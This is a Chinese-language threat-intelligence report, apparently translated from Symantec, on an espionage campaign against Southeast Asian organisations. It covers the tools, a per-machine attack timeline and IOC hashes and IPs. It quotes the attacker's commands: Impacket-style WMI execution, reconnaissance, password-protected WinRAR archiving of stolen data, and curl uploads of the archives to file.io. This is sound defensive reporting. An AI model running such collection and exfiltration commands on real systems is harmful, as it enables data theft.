疑與中國有關的攻擊者針對東南亞重要機構展開攻擊
近日,一場針對東南亞多個高層組織的間諜行動浮出水面,受害者包括兩個國家的政府機構、一家航空交通管制單位、一家電信公司,以及一家媒體機構。這次攻擊行動採用了與中國進階持續性威脅(APT)組織相關的工具,主要目的是蒐集敏感情報。
自 2023 年 10 月起,這些攻擊活動集中於情報蒐集,並採用多種開源工具與"現成工具"(Living-off-the-land)來執行。雖然目前無法明確歸因於特定威脅組織,但所使用的工具顯示出與過往中國 APT 組織的相似性,例如代理工具 Rakshasa 和合法應用程式的 DLL 側載技術,這些工具曾被地球巴庫(Earth Baku,又稱 APT41、Brass Typhoon)等組織使用。
攻擊流程概述
攻擊者通常利用遠端存取工具與 Impacket 框架,透過 WMI(Windows 管理工具)執行命令,安裝鍵盤記錄器、密碼蒐集器和反向代理工具(如 Rakshasa、Stowaway、ReverseSSH),以維持與攻擊者基礎設施的連線。此外,還部署自訂的 DLL 文件,作為認證過濾器來攔截登入憑證。
使用的工具
以下列出此次攻擊所使用的工具,每次攻擊中使用的工具可能因目標不同而有所變化:
Dismap:一款開源資產發現和識別工具。
FastReverseProxy (FRP):一種開源工具,用於將本地伺服器公開到互聯網。
file.io exfiltration:攻擊者將蒐集的數據上傳至合法的檔案共享平台 file.io。
Impacket:一個以 Python 編寫的模組集合,用於操作網絡協議,包括遠端執行、Kerberos 操作及憑證轉存等功能。
Infostealer:蒐集信息的工具,將加密數據記錄在隱藏文件中。
Inveigh:跨平台中間人攻擊工具。
鍵盤記錄器:攔截使用者登入憑證的自訂 DLL 文件。
合法應用程式的 DLL 側載技術:利用合法應用程式文件進行 DLL 側載,如 Bitdefender Crash Handler(2011年版本)。
現成工具:
PowerShell:執行命令和下載有效載荷。
Reg.exe:用於編輯本地或遠端電腦的登錄檔。
WMI:遠端執行命令。
NBTScan:開源的命令行 NetBIOS 掃描器。
PlugX (Korplug):遠端存取木馬,可下載插件來提升功能。
Rakshasa:用於多層代理的 Go 語言工具。
ReverseSSH:具備反向 Shell 功能的 SSH 伺服器。
SharpGPOAbuse:利用組策略對象進行攻擊的 .NET 工具。
Stowaway Proxy Tool:多跳代理工具。
TightVNC:開源遠端桌面軟體。
WinRAR:用於壓縮和加密檔案。
攻擊時間軸
以下記錄了攻擊者對某個目標組織網絡的活動。在此案例中,攻擊者至少在2024年6月至8月期間保持活躍,主要專注於情報收集,尤其是提取並可能外洩感興趣的數據。雖然本案例突出了某些方法,但在其他攻擊中,威脅行為者使用了額外的戰術、技術和程序(TTPs),例如DLL側載(DLL sideloading),以及利用工具如Rakshasa和SharpGPOAbuse等達成目標。
機器 1
5月27日
14:15:檢測到首個惡意活動。攻擊者執行了一個可疑的PowerShell命令,修改註冊表中的系統策略,啟用了「LocalAccountTokenFilterPolicy」設置,使本地帳戶在遠程訪問Windows系統時禁用UAC過濾,允許本地管理員帳戶獲取完全的管理權限。
14:18:攻擊者通過WMI服務執行了以下命令:
cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1716819456.018484 2>&1
該命令和管道命名方式表明使用了類似Impacket的工具進行橫向移動。
14:22:執行了多個信息探索命令,包括顯示無線網絡配置、網絡共享信息以及活動TCP連接的詳細數據:
netsh wlan show profiles net share
netstat -abnop tcp
5月28日
12:51:攻擊者通過WMI執行了一個命令,將一個名為ChromeUpdate.dat的文件重命名為ChromeUpdate.exe,該文件包含嵌入的加密鍵盤記錄器。
13:07:執行了多個註冊表編輯和任務計劃命令,創建自動執行項目以在每次系統啟動時執行文件mscorsvw.exe。
5月30日
03:16:攻擊者執行了一系列net命令來列出網絡共享和遠程主機上的可用資源,並掛載了一些共享目錄。
機器 2
5月27日
13:41:另一台機器也檢測到可疑活動,攻擊者利用TightVNC執行了類似的命令來繞過UAC,並修改註冊表。
15:08:執行了一個命令隱藏特定帳戶,使其在登錄用戶列表中不可見。
15:10:攻擊者提取了註冊表中的密碼文件,並使用WinRAR可能將這些文件壓縮後外洩。
機器 3
8月20日
攻擊者安裝了一個反向SSH工具winupdateser.exe,並創建了一個任務計劃執行批處理文件net.bat。
9月4日
攻擊者在多台機器上創建了多個計劃任務,執行未知的Windows批處理文件。
機器 4
8月6日
攻擊者安裝了一個名為Win32Pro的新身份驗證機制,並執行了一個名為win32pro.dll的文件,該文件被用於捕獲用戶登錄信息(包括時間、域名、用戶名、機器名和密碼)。捕獲的憑據使用RC4加密並存儲在以下位置:
c:\windows\system32\normcache.nls C:\Windows\SYSVOL\domain\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\caches.db
滲透活動
在這些行動過程中,攻擊者在目標組織內進行了滲透活動。他們長期訪問這些網絡,通常持續數月,同時秘密行動以避免被發現。
在此期間,他們專注於收集憑證(包括密碼)以及映射網路以識別感興趣的系統。
滲透是透過多種策略進行的,包括使用 WinRAR 收集感興趣的文件,隨後將其壓縮為受密碼保護的存檔。然後,這些檔案被上傳到 File.io 等雲端儲存服務,使攻擊者能夠秘密竊取敏感數據,同時最大限度地降低暴露風險。這種延長的停留時間和經過計算的方法凸顯了威脅行為者的複雜性和持久性。
CSIDL_SYSTEM\cmd.exe /c CSIDL_SYSTEM_DRIVE\program files\winrar\rar.exe a -k -r -s -m5 -v100M "CSIDL_PROFILE\public\downloads\m1.rar" c:\users\public\downloads\*.csv
CSIDL_SYSTEM\cmd.exe /c CSIDL_SYSTEM_DRIVE\program files\winrar\rar.exe a -k -r -s -m5 -v100M "CSIDL_PROFILE\public\downloads\m2.rar" C:\windows\temp\Netwrix-Report-20240312112337\csv-files\*.csv
CSIDL_SYSTEM\cmd.exe /c CSIDL_SYSTEM_DRIVE\program files\winrar\rar.exe a -k -r -s -m5 -v100M -hp@1232ws "CSIDL_PROFILE\public\downloads\m3.rar" CSIDL_PROFILE\public\downloads\[REMOVED]_sdulog.zip
CSIDL_SYSTEM\cmd.exe /c CSIDL_SYSTEM_DRIVE\program files\winrar\rar.exe a -k -r -s -m5 -v100M -hp@1232ws "CSIDL_PROFILE\public\downloads\m4.rar" \\[REMOVED]\logs$\Users\*.csv
CSIDL_SYSTEM\cmd.exe /c CSIDL_SYSTEM_DRIVE\program files\winrar\rar.exe a -k -r -s -m5 -v100M -hp@1232ws "CSIDL_PROFILE\public\downloads\m5.rar" \\[REMOVED]\logs$\Computers\*.csv
curl -k -F “file=@c:\users\public\[REMOVED]_sdulog.zip” https://file.io
curl -k -F "file=@c:\users\public\downloads\m3.rar" https://file.io
攻擊者歸因
基於受害組織的地理位置與使用工具的特徵,此活動可能與中國 APT 組織相關,例如 Fireant(Mustang Panda、APT31)、Earth Baku(APT41)、Budworm(APT27)等。然而,因為這些組織經常共享工具並採用相似的技術與流程(TTP),目前無法準確指認特定組織。
防護建議
建議定期更新防護策略,並檢查是否有相關的惡意指標(IOC)。
有關最新的防護更新,請造訪Symantec Protection Bulletin。
相關指標 (IOC)
如果 IOC 是惡意的並且我們可以使用該文件,Symantec Endpoint 產品將偵測並封鎖該文件。
d312b0e1968beae5a2ff3be2d8efc6d1bfdab3b1aec6faf8eafa295c47230194 – Stowaway
e0f3b8028a2969e280efdd770978a54181fc242dd26cbf0a22e922f1e6a1b951 – Batch file loader
33cb9f06338a9ea17107abbdc478071bbe097f80a835bbac462c4bb17cd0b798 – PlugX loader
8b6d081be732743aa6f6bccfb68b3f21878aa36723c1311f50406d752aacc9fa – Keylogger
89707a5bf9862a9effb1618a1a285a8d027fb343f6103f4bc68f736889f0a86e – Keylogger
9fe3ff51443c41fe0be01a55a3a5fbfb261bcf63b3b0cd67f65a2c00a6d52ff3 – Keylogger
e6cecba25abd092bfccba825298edecd2fdee6c428d9ae85399fabc54355e31f – Keylogger loader
779b4a5f53d3128ab53dd8e13c362d6d077c3eb4987f878d7ef3416c801ef0dd - ReverseSSH
e9572549b2f35f32861ffc9be160e9c8f86e4d9d3dd43c3727f0df4dc2acc944 – Infostealer
e0f3b8028a2969e280efdd770978a54181fc242dd26cbf0a22e922f1e6a1b951 – Credential-dumping tool
b7472c6f6cba47ec85fa147c78f3a7a40a4fc5913fe41654ab499a7b1bd4ea2e – Batch file used to register custom DLL to hook into Windows authentication mechanisms
3e4d86c4e1d463b99478f960c9c00f7d11cd0d1fb8dd2948e8340b7bc3550904 – Batch file used to register custom DLL to hook into Windows authentication mechanisms
fb603072418da9150673ac9826a46a2b2462c8fc0afeacb2034ecb2b7d666001 – Batch file used to register custom DLL to hook into Windows authentication mechanisms
340e872c814d221989ca2cb93819b9ad307572851b5b3f8bfcf791ff08e0e677 – Suspicious Windows script file
80c3effc8f017b26c549bed8ba82097a6be7a59e383dd35adc917bf661e0a754 – Windows script file that drops SharpGPOAbuse and Rakshasa
9b1794a1c8c59631d95178c7c4e2f5917b84864b342b4cfdab8f0990c3dbf5d2 – FastReverseProxy
ca0eeb4b71d4124dec785a9492970e9b1cfaa4cab0e8ca4486fc14b2e256d7f7 – Inveigh
d7b85b92fb185272b89a7ff27424bff22a5a6542f6bde9838482aa9f87979828 – Dismap
fa6de0d0bc9d83a3942aa8b3a12a5924dc662bec32cb3c2f212a0a0c0a4ebc7a – SharpNbtscan
10029f14f2718362144b0e9b660994e8fb944af9ce9fcff04925f8b0615bb509 – SharpGPOAbuse
aa096f18e712ac0604e18d16441b672fcb393de9edf3ff4393519c48ab26a158 – Rakshasa
386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd – Bitdefender Crash Handler (2011)
38.60.146[.]78:443 – Stowaway
118.107.219[.]66:443 – Stowaway
45.123.188[.]180 – FastReverseProxy
198.244.237[.]131 – Rakshasa download
原文出處 Symatnec Enterprise Blogs
Comments